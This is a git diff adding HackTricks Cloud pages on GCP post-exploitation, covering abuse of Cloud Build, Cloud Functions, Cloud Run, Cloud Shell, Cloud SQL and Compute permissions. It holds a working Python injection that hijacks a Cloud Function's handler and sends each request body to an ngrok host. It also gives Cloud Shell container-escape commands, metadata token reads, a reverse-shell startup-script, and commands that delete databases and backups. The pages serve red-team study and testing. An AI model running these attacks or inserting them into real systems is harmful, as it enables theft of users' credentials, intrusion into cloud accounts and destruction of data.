+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md
new file mode 100644
index 0000000000..7fc7b5f478
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md
@@ -0,0 +1,56 @@
+# GCP - Cloud Build Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud Build
+
+For more information about Cloud Build check:
+
+{% content-ref url="../gcp-services/gcp-cloud-build-enum.md" %}
+[gcp-cloud-build-enum.md](../gcp-services/gcp-cloud-build-enum.md)
+{% endcontent-ref %}
+
+### `cloudbuild.builds.approve`
+
+With this permission you can approve the execution of a **codebuild that require approvals**.
+
+```bash
+# Check the REST API in https://cloud.google.com/build/docs/api/reference/rest/v1/projects.locations.builds/approve
+curl -X POST \
+     -H "Authorization: Bearer $(gcloud auth print-access-token)" \
+     -H "Content-Type: application/json" \
+     -d '{{
+         "approvalResult": {
+           object (ApprovalResult)
+         }
+       }' \
+     "https://cloudbuild.googleapis.com/v1/projects/<PROJECT_ID>/locations/<LOCATION>/builds/<BUILD_ID>:approve"
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md
new file mode 100644
index 0000000000..24c013b55e
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md
@@ -0,0 +1,143 @@
+# GCP - Cloud Functions Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud Functions
+
+Find some information about Cloud Functions in:
+
+{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %}
+[gcp-cloud-functions-enum.md](../gcp-services/gcp-cloud-functions-enum.md)
+{% endcontent-ref %}
+
+### `cloudfunctions.functions.sourceCodeGet`
+
+With this permission you can get a **signed URL to be able to download the source code** of the Cloud Function:
+
+{% code overflow="wrap" %}
+```bash
+curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions/{function-name}:generateDownloadUrl \
+-H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \
+-H "Content-Type: application/json" \
+-d '{}'
+```
+{% endcode %}
+
+### Steal Cloud Function Requests
+
+If the Cloud Function is managing sensitive information that users are sending (e.g. passwords or tokens), with enough privileges you could **modify the source code of the function and exfiltrate** this information.
+
+Moreover, Cloud Functions running in python use **flask** to expose the web server, if you somehow find a code injection vulnerability inside the flaks process (a SSTI vulnerability for example), it's possible to **override the function handler** that is going to receive the HTTP requests for a **malicious function** that can **exfiltrate the request** before passing it to the legit handler.
+
+For example this code implements the attack:
+
+```python
+import functions_framework
+
+
+# Some python handler code
+@functions_framework.http
+def hello_http(request, last=False, error=""):
+    """HTTP Cloud Function.
+    Args:
+        request (flask.Request): The request object.
+        <https://flask.palletsprojects.com/en/1.1.x/api/#incoming-request-data>
+    Returns:
+        The response text, or any set of values that can be turned into a
+        Response object using `make_response`
+        <https://flask.palletsprojects.com/en/1.1.x/api/#flask.make_response>.
+    """
+
+    if not last:
+        return injection()
+    else:
+        if error:
+            return error
+        else:
+            return "Hello World!"
+
+
+
+# Attacker code to inject
+# Code based on the one from https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py
+
+new_function = """
+def exfiltrate(request):
+    try:
+        from urllib import request as urllib_request
+        req = urllib_request.Request("https://8b01-81-33-67-85.ngrok-free.app", data=bytes(str(request._get_current_object().get_data()), "utf-8"), method="POST")
+        urllib_request.urlopen(req, timeout=0.1)
+    except Exception as e:
+        if not "read operation timed out" in str(e):
+            return str(e)
+    
+    return ""
+
+def new_http_view_func_wrapper(function, request):
+    def view_func(path):
+        try:
+            error = exfiltrate(request)
+            return function(request._get_current_object(), last=True, error=error)
+        except Exception as e:
+            return str(e)
+    
+    return view_func
+"""
+
+def injection():
+    global new_function
+    try:
+        from flask import current_app as app
+        import flask
+        import os
+        import importlib
+        import sys        
+
+        if os.access('/tmp', os.W_OK):
+            new_function_path = "/tmp/function.py"
+            with open(new_function_path, "w") as f:
+                f.write(new_function)
+            os.chmod(new_function_path, 0o777)
+        
+        if not os.path.exists('/tmp/function.py'):
+            return "/tmp/function.py doesn't exists"
+
+        # Get relevant function names
+        handler_fname = os.environ.get("FUNCTION_TARGET") # Cloud Function env variable indicating the name of the function to habdle requests
+        source_path = os.environ.get("FUNCTION_SOURCE", "./main.py") # Path to the source file of the Cloud Function (./main.py by default)
+        realpath = os.path.realpath(source_path) # Get full path
+
+        # Get the modules representations
+        spec_handler = importlib.util.spec_from_file_location("main_handler", realpath)
+        module_handler = importlib.util.module_from_spec(spec_handler)
+
+        spec_backdoor = importlib.util.spec_from_file_location('backdoor', '/tmp/function.py')
+        module_backdoor = importlib.util.module_from_spec(spec_backdoor)
+
+        # Load the modules inside the app context
+        with app.app_context():
+            spec_handler.loader.exec_module(module_handler)
+            spec_backdoor.loader.exec_module(module_backdoor)
+
+        # make the cloud funtion use as handler the new function 
+        prev_handler = getattr(module_handler, handler_fname)
+        new_func_wrap = getattr(module_backdoor, 'new_http_view_func_wrapper')
+        app.view_functions["run"] = new_func_wrap(prev_handler, flask.request)
+        return "Injection completed!"
+    
+    except Exception as e:
+        return str(e)
+```
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md
new file mode 100644
index 0000000000..0e6bdccac8
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md
@@ -0,0 +1,49 @@
+# GCP - Cloud Run Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud Run
+
+For more information about Cloud Run check:
+
+{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %}
+[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md)
+{% endcontent-ref %}
+
+### Access the images
+
+If you can access the container images check the code for vulnerabilities and hardcoded sensitive information. Also for sensitive information in env variables.
+
+If the images are stored in repos inside the service Artifact Registry and the user has read access over the repos, he could also download the image from this service.
+
+### Modify & redeploy the image
+
+Modify the run image to steal information and redeploy the new version (just uploading a new docker container with the same tags won't get it executed). For example, if it's exposing a login page, steal the credentials users are sending.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md
new file mode 100644
index 0000000000..cd5dbc5226
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md
@@ -0,0 +1,136 @@
+# GCP - Cloud Shell Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud Shell
+
+For more information about Cloud Shell check:
+
+{% content-ref url="../gcp-services/gcp-cloud-shell-enum.md" %}
+[gcp-cloud-shell-enum.md](../gcp-services/gcp-cloud-shell-enum.md)
+{% endcontent-ref %}
+
+### Container Escape
+
+Note that the Google Cloud Shell runs inside a container, you can **easily escape to the host** by doing:
+
+{% code overflow="wrap" %}
+```bash
+sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
+sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
+sudo docker -H unix:///google/host/var/run/docker.sock start escaper
+sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
+```
+{% endcode %}
+
+This is not considered a vulnerability by google, but it gives you a wider vision of what is happening in that env.
+
+Moreover, notice that from the host you can find a service account token:
+
+{% code overflow="wrap" %}
+```bash
+wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
+default/
+vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
+```
+{% endcode %}
+
+With the following scopes:
+
+{% code overflow="wrap" %}
+```bash
+wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
+
+https://www.googleapis.com/auth/devstorage.read_only
+https://www.googleapis.com/auth/logging.write
+https://www.googleapis.com/auth/monitoring.write
+```
+{% endcode %}
+
+Enumerate metadata with LinPEAS:
+
+{% code overflow="wrap" %}
+```bash
+cd /tmp
+wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
+sh linpeas.sh -o cloud
+```
+{% endcode %}
+
+After using [https://github.com/carlospolop/bf\_my\_gcp\_permissions](https://github.com/carlospolop/bf_my_gcp_permissions) with the token of the Service Account **no permission was discovered**...
+
+### Use it as Proxy
+
+If you want to use your google cloud shell instance as proxy you need to run the following commands (or insert them in the .bashrc file):
+
+```bash
+sudo apt install -y squid
+```
+
+Just for let you know Squid is a http proxy server. Create a **squid.conf** file with the following settings:
+
+```bash
+http_port 3128
+cache_dir /var/cache/squid 100 16 256
+acl all src 0.0.0.0/0
+http_access allow all
+```
+
+copy the **squid.conf** file to **/etc/squid**
+
+```bash
+sudo cp squid.conf /etc/squid
+```
+
+Finally run the squid service:
+
+```bash
+sudo service squid start
+```
+
+Use ngrok to let the proxy be available from outside:
+
+```bash
+./ngrok tcp 3128
+```
+
+After running copy the tcp:// url. If you want to run the proxy from a browser it is suggested to remove the tcp:// part and the port and put the port in the port field of your browser proxy settings (squid is a http proxy server).
+
+For better use at startup the .bashrc file should have the following lines:
+
+```bash
+sudo apt install -y squid
+sudo cp squid.conf /etc/squid/
+sudo service squid start
+cd ngrok;./ngrok tcp 3128
+```
+
+The instructions were copied from [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key). Check that page for other crazy ideas to run any kind of software (databases and even windows) in Cloud Shell.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
new file mode 100644
index 0000000000..1235ac87df
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
@@ -0,0 +1,131 @@
+# GCP - Cloud SQL Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud SQL
+
+For more information about Cloud SQL check:
+
+{% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %}
+[gcp-cloud-sql-enum.md](../gcp-services/gcp-cloud-sql-enum.md)
+{% endcontent-ref %}
+
+### `cloudsql.instances.update`, ( `cloudsql.instances.get`)
+
+To connect to the databases you **just need access to the database port** and know the **username** and **password**, there isn't any IAM requirements. So, an easy way to get access, supposing that the database has a public IP address, is to update the allowed networks and **allow your own IP address to access it**.
+
+```bash
+# Use --assign-ip to make the database get a public IPv4
+gcloud sql instances patch $INSTANCE_NAME \
+    --authorized-networks "$(curl ifconfig.me)" \
+    --assign-ip \
+    --quiet
+
+mysql -h <ip_db> # If mysql
+
+# With cloudsql.instances.get you can use gcloud directly
+gcloud sql connect mysql --user=root --quiet
+```
+
+It's also possible to use **`--no-backup`** to **disrupt the backups** of the database.
+
+As these are the requirements I'm not completely sure what are the permissions **`cloudsql.instances.connect`** and **`cloudsql.instances.login`** for. If you know it send a PR!
+
+### `cloudsql.users.list`
+
+Get a **list of all the users** of the database:
+
+```bash
+gcloud sql users list --instance <intance-name>
+```
+
+### `cloudsql.users.create`
+
+This permission allows to **create a new user inside** the database:
+
+```bash
+gcloud sql users create <username> --instance <instance-name> --password <password>
+```
+
+### `cloudsql.users.update`
+
+This permission allows to **update user inside** the database. For example, you could change its password:
+
+{% code overflow="wrap" %}
+```bash
+gcloud sql users set-password <username> --instance <instance-name> --password <password>
+```
+{% endcode %}
+
+### `cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`
+
+Backups might contain **old sensitive information**, so it's interesting to check them.\
+**Restore a backup** inside a database:
+
+```bash
+gcloud sql backups restore <backup-id> --restore-instance <instance-id>
+```
+
+To do it in a more stealth way it's recommended to create a new SQL instance and recover the data there instead of in the currently running databases.
+
+### `cloudsql.backupRuns.delete`
+
+This permission allow to delete backups:
+
+```bash
+gcloud sql backups delete <backup-id> --instance <instance-id>
+```
+
+### `cloudsql.instances.export`, `storage.objects.create`
+
+**Export a database** to a Cloud Storage Bucket so you can access it from there:
+
+```bash
+# Export sql format, it could also be csv and bak
+gcloud sql export sql <instance-id> <gs://bucketName/fileName> --database <db>
+```
+
+### `cloudsql.instances.import`, `storage.objects.get`
+
+**Import a database** (overwrite) from a Cloud Storage Bucket:
+
+```bash
+# Import format SQL, you could also import formats bak and csv
+gcloud sql import sql <instance-id> <gs://bucketName/fileName>
+```
+
+### `cloudsql.databases.delete`
+
+Delete a database from the db instance:
+
+```bash
+gcloud sql databases delete <db-name> --instance <instance-id>
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md
new file mode 100644
index 0000000000..95ba0b1c60
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md
@@ -0,0 +1,147 @@
+# GCP - Compute Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Compute
+
+For more information about Compute and VPC (Networking) check:
+
+{% content-ref url="../gcp-services/gcp-compute-instances-enum/" %}
+[gcp-compute-instances-enum](../gcp-services/gcp-compute-instances-enum/)
+{% endcontent-ref %}
+
+### Export & Inspect Images locally
+
+This would allow an attacker to **access the data contained inside already existing images** or **create new images of running VMs** and access their data without having access to the running VM.
+
+It's possible to export a VM image to a bucket and then download it and mount it locally with the command:
+
+{% code overflow="wrap" %}
+```bash
+gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
+# The download the export from the bucket and mount it locally
+```
+{% endcode %}
+
+Fore performing this action the attacker might need privileges over the storage bucket and for sure **privileges over cloudbuild** as it's the **service** which is going to be asked to perform the export\
+Moreover, for this to work the codebuild SA and the compute SA needs privileged permissions.\
+The cloudbuild SA `<project-id>@cloudbuild.gserviceaccount.com` needs:
+
+* roles/iam.serviceAccountTokenCreator
+* roles/compute.admin
+* roles/iam.serviceAccountUser
+
+And the SA `<project-id>-compute@developer.gserviceaccount.com` needs:
+
+* oles/compute.storageAdmin
+* roles/storage.objectAdmin
+
+### Export & Inspect Snapshots & Disks locally
+
+It's not possible to directly export snapshots and disks, but it's possible to **transform a snapshot in a disk, a disk in an image** and following the **previous section**, export that image to inspect it locally
+
+{% code overflow="wrap" %}
+```bash
+# Create a Disk from a snapshot
+gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]
+
+# Create an image from a disk
+gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]
+```
+{% endcode %}
+
+### Inspect an Image creating a VM
+
+With the goal of accessing the **data stored in an image** or inside a **running VM** from where an attacker **has created an image,** it possible to grant an external account access over the image:
+
+```bash
+gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
+  --member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
+  --role='roles/compute.imageUser'
+```
+
+and then create a new VM from it:
+
+```bash
+gcloud compute instances create [INSTANCE_NAME] \
+  --project=[TARGET_PROJECT_ID] \
+  --zone=[ZONE] \
+  --image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]
+```
+
+If you could not give your external account access over image, you could launch a VM using that image in the victims project and **make the metadata execute a reverse shell** to access the image adding the param:
+
+```bash
+    --metadata startup-script='#! /bin/bash
+        echo "hello"; <reverse shell>'
+```
+
+### Inspect a Snapshot/Disk attaching it to a VM
+
+With the goal of accessing the **data stored in a disk or a snapshot, you could transform the snapshot into a disk, a disk into an image and follow th preivous steps.**
+
+Or you could **grant an external account access** over the disk (if the starting point is a snapshot give access over the snapshot or create a disk from it):
+
+```bash
+gcloud projects add-iam-policy-binding [PROJECT_ID] \
+  --member='user:[USER_EMAIL]' \
+  --role='roles/compute.storageAdmin'
+```
+
+**Attach the disk** to an instance:
+
+```bash
+gcloud compute instances attach-disk [INSTANCE_NAME] \
+  --disk [DISK_NAME] \
+  --zone [ZONE]
+```
+
+Mount the disk inside the VM:
+
+1.  **SSH into the VM**:
+
+    ```sh
+    gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]
+    ```
+2. **Identify the Disk**: Once inside the VM, identify the new disk by listing the disk devices. Typically, you can find it as `/dev/sdb`, `/dev/sdc`, etc.
+3. **Format and Mount the Disk** (if it's a new or raw disk):
+   *   Create a mount point:
+
+       ```sh
+       sudo mkdir -p /mnt/disks/[MOUNT_DIR]
+       ```
+   *   Mount the disk:
+
+       ```sh
+       sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]
+       ```
+
+If you **cannot give access to a external project** to the snapshot or disk, you might need to p**erform these actions inside an instance in the same project as the snapshot/disk**.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
